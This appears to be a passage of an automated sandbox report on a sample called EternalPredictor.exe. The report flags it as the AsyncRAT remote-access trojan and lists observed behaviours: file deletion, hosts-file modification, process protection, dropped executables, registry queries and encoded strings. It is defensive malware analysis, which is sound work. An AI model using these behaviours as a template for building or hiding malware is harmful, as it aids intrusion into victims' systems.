                        Source: C:\Users\user\AppData\Roaming\program.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\QCFWYSKMHA.xlsxJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\IPKGELNTQY.xlsxJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\EWZCVGNOWT.mp3Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\LSBIHQFDVT.docxJump to behavior
                        Modifies the hosts file
                        Source: C:\Users\user\AppData\Roaming\program.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: cmd.exeProcess created: 45

                        Operating System Destruction

                        barindex
                        Protects its processes via BreakOnTermination flag
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: 01 00 00 00 Jump to behavior

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 2.0.eternal.exe.bc0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.2.EternalPredictor.exe.3d22330.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000002.00000000.1499082225.0000000000BC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000000.00000002.1521249404.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Roaming\eternal.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Writes or reads registry keys via WMI
                        Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                        Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                        Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                        Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                        Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                        Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                        Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                        Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                        Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                        Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                        Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                        Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                        Source: C:\Users\user\AppData\Roaming\eternal.exeCode function: 2_2_00007FFB4A137EC62_2_00007FFB4A137EC6
                        Source: C:\Users\user\AppData\Roaming\eternal.exeCode function: 2_2_00007FFB4A1390982_2_00007FFB4A139098
                        Source: C:\Users\user\AppData\Roaming\eternal.exeCode function: 2_2_00007FFB4A13186D2_2_00007FFB4A13186D
                        Source: C:\Users\user\AppData\Roaming\eternal.exeCode function: 2_2_00007FFB4A13669D2_2_00007FFB4A13669D
                        Source: C:\Users\user\AppData\Roaming\eternal.exeCode function: 2_2_00007FFB4A1320592_2_00007FFB4A132059
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C6510005_2_00007FF72C651000
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C6769645_2_00007FF72C676964
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C6589E05_2_00007FF72C6589E0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C66E5705_2_00007FF72C66E570
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C661D545_2_00007FF72C661D54
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C665D305_2_00007FF72C665D30
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C6635A05_2_00007FF72C6635A0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C675E7C5_2_00007FF72C675E7C
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C66DEF05_2_00007FF72C66DEF0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C669EA05_2_00007FF72C669EA0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C6687945_2_00007FF72C668794
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C661F605_2_00007FF72C661F60
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C6617405_2_00007FF72C661740
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C6797285_2_00007FF72C679728
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C6598005_2_00007FF72C659800
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C6718745_2_00007FF72C671874
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C6680E45_2_00007FF72C6680E4
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C6708C85_2_00007FF72C6708C8
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C6740AC5_2_00007FF72C6740AC
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C6621645_2_00007FF72C662164
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C6619445_2_00007FF72C661944
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C6639A45_2_00007FF72C6639A4
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C66DA5C5_2_00007FF72C66DA5C
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C65A2DB5_2_00007FF72C65A2DB
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C661B505_2_00007FF72C661B50
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C662C105_2_00007FF72C662C10
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C673C105_2_00007FF72C673C10
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C675C005_2_00007FF72C675C00
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C65A4745_2_00007FF72C65A474
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C6764185_2_00007FF72C676418
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C6708C85_2_00007FF72C6708C8
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C65ACAD5_2_00007FF72C65ACAD
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C6510008_2_00007FF72C651000
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C6769648_2_00007FF72C676964
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C66E5708_2_00007FF72C66E570
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C661D548_2_00007FF72C661D54
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C665D308_2_00007FF72C665D30
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C6635A08_2_00007FF72C6635A0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C675E7C8_2_00007FF72C675E7C
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C66DEF08_2_00007FF72C66DEF0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C669EA08_2_00007FF72C669EA0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C6687948_2_00007FF72C668794
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C661F608_2_00007FF72C661F60
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C6617408_2_00007FF72C661740
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C6797288_2_00007FF72C679728
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C6598008_2_00007FF72C659800
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C6718748_2_00007FF72C671874
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C6680E48_2_00007FF72C6680E4
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C6708C88_2_00007FF72C6708C8
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C6740AC8_2_00007FF72C6740AC
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C6621648_2_00007FF72C662164
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C6619448_2_00007FF72C661944
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C6589E08_2_00007FF72C6589E0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C6639A48_2_00007FF72C6639A4
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C66DA5C8_2_00007FF72C66DA5C
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C65A2DB8_2_00007FF72C65A2DB
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C661B508_2_00007FF72C661B50
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C662C108_2_00007FF72C662C10
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C673C108_2_00007FF72C673C10
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C675C008_2_00007FF72C675C00
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C65A4748_2_00007FF72C65A474
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C6764188_2_00007FF72C676418
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C6708C88_2_00007FF72C6708C8
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C65ACAD8_2_00007FF72C65ACAD
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA42203508_2_00007FFBA4220350
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA41719508_2_00007FFBA4171950
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA41722708_2_00007FFBA4172270
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA41713008_2_00007FFBA4171300
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA43E1F408_2_00007FFBA43E1F40
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA43D11E08_2_00007FFBA43D11E0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA43D1E208_2_00007FFBA43D1E20
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA60D5C008_2_00007FFBA60D5C00
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA60987208_2_00007FFBA6098720
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA609116D8_2_00007FFBA609116D
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA61088708_2_00007FFBA6108870
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA60916FE8_2_00007FFBA60916FE
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA6091D938_2_00007FFBA6091D93
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA60927028_2_00007FFBA6092702
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA609149C8_2_00007FFBA609149C
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA6091CBC8_2_00007FFBA6091CBC
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA6091B548_2_00007FFBA6091B54
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA609117C8_2_00007FFBA609117C
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA6091A0F8_2_00007FFBA6091A0F
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA60926178_2_00007FFBA6092617
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA610AC808_2_00007FFBA610AC80
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA60C89208_2_00007FFBA60C8920
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA6091EE28_2_00007FFBA6091EE2
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA60916188_2_00007FFBA6091618
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA60921C68_2_00007FFBA60921C6
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA6091C128_2_00007FFBA6091C12
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66A54E88_2_00007FFBA66A54E8
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66A5CBC8_2_00007FFBA66A5CBC
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66AECC08_2_00007FFBA66AECC0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66ABF748_2_00007FFBA66ABF74
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66A87348_2_00007FFBA66A8734
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66D1C008_2_00007FFBA66D1C00
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA67A92B08_2_00007FFBA67A92B0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA67B22508_2_00007FFBA67B2250
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA6814C708_2_00007FFBA6814C70
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA68077508_2_00007FFBA6807750
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA67F06C08_2_00007FFBA67F06C0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4A71D08_2_00007FFBAA4A71D0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4910918_2_00007FFBAA491091
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4910C08_2_00007FFBAA4910C0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA493E408_2_00007FFBAA493E40
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4B5F008_2_00007FFBAA4B5F00
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4B12B08_2_00007FFBAA4B12B0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4B8F608_2_00007FFBAA4B8F60
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4B2F808_2_00007FFBAA4B2F80
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4B73FC8_2_00007FFBAA4B73FC
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4B23B08_2_00007FFBAA4B23B0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4BF5348_2_00007FFBAA4BF534
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4B19208_2_00007FFBAA4B1920
                        Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 22_2_00007FFB4A13205922_2_00007FFB4A132059
                        Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 22_2_00007FFB4A130E6822_2_00007FFB4A130E68
                        Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 22_2_00007FFB4A13186D22_2_00007FFB4A13186D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 51_2_00007FFB4A123B9D51_2_00007FFB4A123B9D
                        Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 91_2_00007FFB4A12205991_2_00007FFB4A122059
                        Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 91_2_00007FFB4A120E6891_2_00007FFB4A120E68
                        Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 91_2_00007FFB4A12186D91_2_00007FFB4A12186D
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: String function: 00007FFBA66AEC88 appears 68 times
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: String function: 00007FFBA66AEB58 appears 49 times
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: String function: 00007FFBA610D341 appears 687 times
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: String function: 00007FFBAA499598 appears 326 times
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: String function: 00007FF72C652710 appears 104 times
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: String function: 00007FFBAA4994E8 appears 38 times
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: String function: 00007FFBA6091325 appears 298 times
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: String function: 00007FFBA610D32F appears 182 times
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: String function: 00007FF72C652910 appears 34 times
                        Source: EternalPredictor.exe, 00000000.00000002.1521249404.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeternal.exe4 vs EternalPredictor.exe
                        Source: EternalPredictor.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: Commandline size = 3647
                        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: Commandline size = 3647Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 2.0.eternal.exe.bc0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.2.EternalPredictor.exe.3d22330.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000002.00000000.1499082225.0000000000BC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000000.00000002.1521249404.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Roaming\eternal.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: eternal.exe.0.dr, z7GL3GcSz0bU9xxBylPHvbaUX8.csCryptographic APIs: 'TransformFinalBlock'
                        Source: eternal.exe.0.dr, z7GL3GcSz0bU9xxBylPHvbaUX8.csCryptographic APIs: 'TransformFinalBlock'
                        Source: eternal.exe.0.dr, pwLyC8IGS9fWPw8AOOpq13VTDw.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, z7GL3GcSz0bU9xxBylPHvbaUX8.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, z7GL3GcSz0bU9xxBylPHvbaUX8.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, pwLyC8IGS9fWPw8AOOpq13VTDw.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, z7GL3GcSz0bU9xxBylPHvbaUX8.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, z7GL3GcSz0bU9xxBylPHvbaUX8.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, pwLyC8IGS9fWPw8AOOpq13VTDw.csCryptographic APIs: 'TransformFinalBlock'
                        Source: eternal.exe.0.dr, ehFF3g5JMWmvPBY7f8PHXvmxPU1QBWGhSW9HZi8z2cL2PB9AU.csBase64 encoded string: 'zwUuG1nByTCEbaZKHWOAlu2mCDp7JUhoMorAGSUIUqs7jGnGSWfcL7nHRupmiUNZgDRBDBUz7hlO'
                        Source: eternal.exe.0.dr, OikC8q0jRtn3fHthyLWpHpUTg7BlI3UgPeim5M0jeam7kzrAn.csBase64 encoded string: 'nOPvjGtOiWrak5U6dMLaaYXnV5efRXgPksc1lS1MhJkqNd2g2hTJrZQwTI60OSsaRSVeV0APlUZT'
                        Source: eternal.exe.0.dr, fHfgyTqtDDXlgFY83FcOCVN0lmCsgZzHJUE3KRMC6.csBase64 encoded string: 'r9ZP2HoqHH770WDyWixlEX8ZRUYr87OFDSl4HtLk1VmHoDXC9z7gjvEpvEhFSKRin9IH', 'Yr6d8vHWsl1qg9CkWxf6ZUUnm0jR7Ke4Mfc2h4jChLnQgdVIMGjbfPrKphFxKxQHby6f', 'meCKLNBFqzdfahnjOzKN2HfHAYWoXX3kR875tED3tufBVEQEvOWeT72R871e8kvPOCp7', 't8tUYo6qF3AbbmaIzYNdk1tEW1YDNbUFN7MOTWhg89CaDB7M29qu4afdXBX3c9m8R74p', 'yOif5zu6batbtJMG78mjMggTXaUoZCMKTy1x4aM2XVeveuayD5ImGboaJ8MvCFi5Bzzl', 'hp5gyXDcXfr0IbLlGgN4BEoDIMeolWnxebvOOVVABA0hQ5FhBVeK5kTjAOFLkt2bpUb2'
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, ehFF3g5JMWmvPBY7f8PHXvmxPU1QBWGhSW9HZi8z2cL2PB9AU.csBase64 encoded string: 'zwUuG1nByTCEbaZKHWOAlu2mCDp7JUhoMorAGSUIUqs7jGnGSWfcL7nHRupmiUNZgDRBDBUz7hlO'
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, OikC8q0jRtn3fHthyLWpHpUTg7BlI3UgPeim5M0jeam7kzrAn.csBase64 encoded string: 'nOPvjGtOiWrak5U6dMLaaYXnV5efRXgPksc1lS1MhJkqNd2g2hTJrZQwTI60OSsaRSVeV0APlUZT'
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, fHfgyTqtDDXlgFY83FcOCVN0lmCsgZzHJUE3KRMC6.csBase64 encoded string: 'r9ZP2HoqHH770WDyWixlEX8ZRUYr87OFDSl4HtLk1VmHoDXC9z7gjvEpvEhFSKRin9IH', 'Yr6d8vHWsl1qg9CkWxf6ZUUnm0jR7Ke4Mfc2h4jChLnQgdVIMGjbfPrKphFxKxQHby6f', 'meCKLNBFqzdfahnjOzKN2HfHAYWoXX3kR875tED3tufBVEQEvOWeT72R871e8kvPOCp7', 't8tUYo6qF3AbbmaIzYNdk1tEW1YDNbUFN7MOTWhg89CaDB7M29qu4afdXBX3c9m8R74p', 'yOif5zu6batbtJMG78mjMggTXaUoZCMKTy1x4aM2XVeveuayD5ImGboaJ8MvCFi5Bzzl', 'hp5gyXDcXfr0IbLlGgN4BEoDIMeolWnxebvOOVVABA0hQ5FhBVeK5kTjAOFLkt2bpUb2'
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, ehFF3g5JMWmvPBY7f8PHXvmxPU1QBWGhSW9HZi8z2cL2PB9AU.csBase64 encoded string: 'zwUuG1nByTCEbaZKHWOAlu2mCDp7JUhoMorAGSUIUqs7jGnGSWfcL7nHRupmiUNZgDRBDBUz7hlO'
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, OikC8q0jRtn3fHthyLWpHpUTg7BlI3UgPeim5M0jeam7kzrAn.csBase64 encoded string: 'nOPvjGtOiWrak5U6dMLaaYXnV5efRXgPksc1lS1MhJkqNd2g2hTJrZQwTI60OSsaRSVeV0APlUZT'
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, fHfgyTqtDDXlgFY83FcOCVN0lmCsgZzHJUE3KRMC6.csBase64 encoded string: 'r9ZP2HoqHH770WDyWixlEX8ZRUYr87OFDSl4HtLk1VmHoDXC9z7gjvEpvEhFSKRin9IH', 'Yr6d8vHWsl1qg9CkWxf6ZUUnm0jR7Ke4Mfc2h4jChLnQgdVIMGjbfPrKphFxKxQHby6f', 'meCKLNBFqzdfahnjOzKN2HfHAYWoXX3kR875tED3tufBVEQEvOWeT72R871e8kvPOCp7', 't8tUYo6qF3AbbmaIzYNdk1tEW1YDNbUFN7MOTWhg89CaDB7M29qu4afdXBX3c9m8R74p', 'yOif5zu6batbtJMG78mjMggTXaUoZCMKTy1x4aM2XVeveuayD5ImGboaJ8MvCFi5Bzzl', 'hp5gyXDcXfr0IbLlGgN4BEoDIMeolWnxebvOOVVABA0hQ5FhBVeK5kTjAOFLkt2bpUb2'
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, IsDp1ecpTFNA4aR1tkuj7x6jBnVeFOWVVQprEerK5JT5WDvVxJvOqcheXfyHjH2HvZRfEKvHfLNgLVkvs.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, IsDp1ecpTFNA4aR1tkuj7x6jBnVeFOWVVQprEerK5JT5WDvVxJvOqcheXfyHjH2HvZRfEKvHfLNgLVkvs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, IsDp1ecpTFNA4aR1tkuj7x6jBnVeFOWVVQprEerK5JT5WDvVxJvOqcheXfyHjH2HvZRfEKvHfLNgLVkvs.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, IsDp1ecpTFNA4aR1tkuj7x6jBnVeFOWVVQprEerK5JT5WDvVxJvOqcheXfyHjH2HvZRfEKvHfLNgLVkvs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: eternal.exe.0.dr, IsDp1ecpTFNA4aR1tkuj7x6jBnVeFOWVVQprEerK5JT5WDvVxJvOqcheXfyHjH2HvZRfEKvHfLNgLVkvs.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
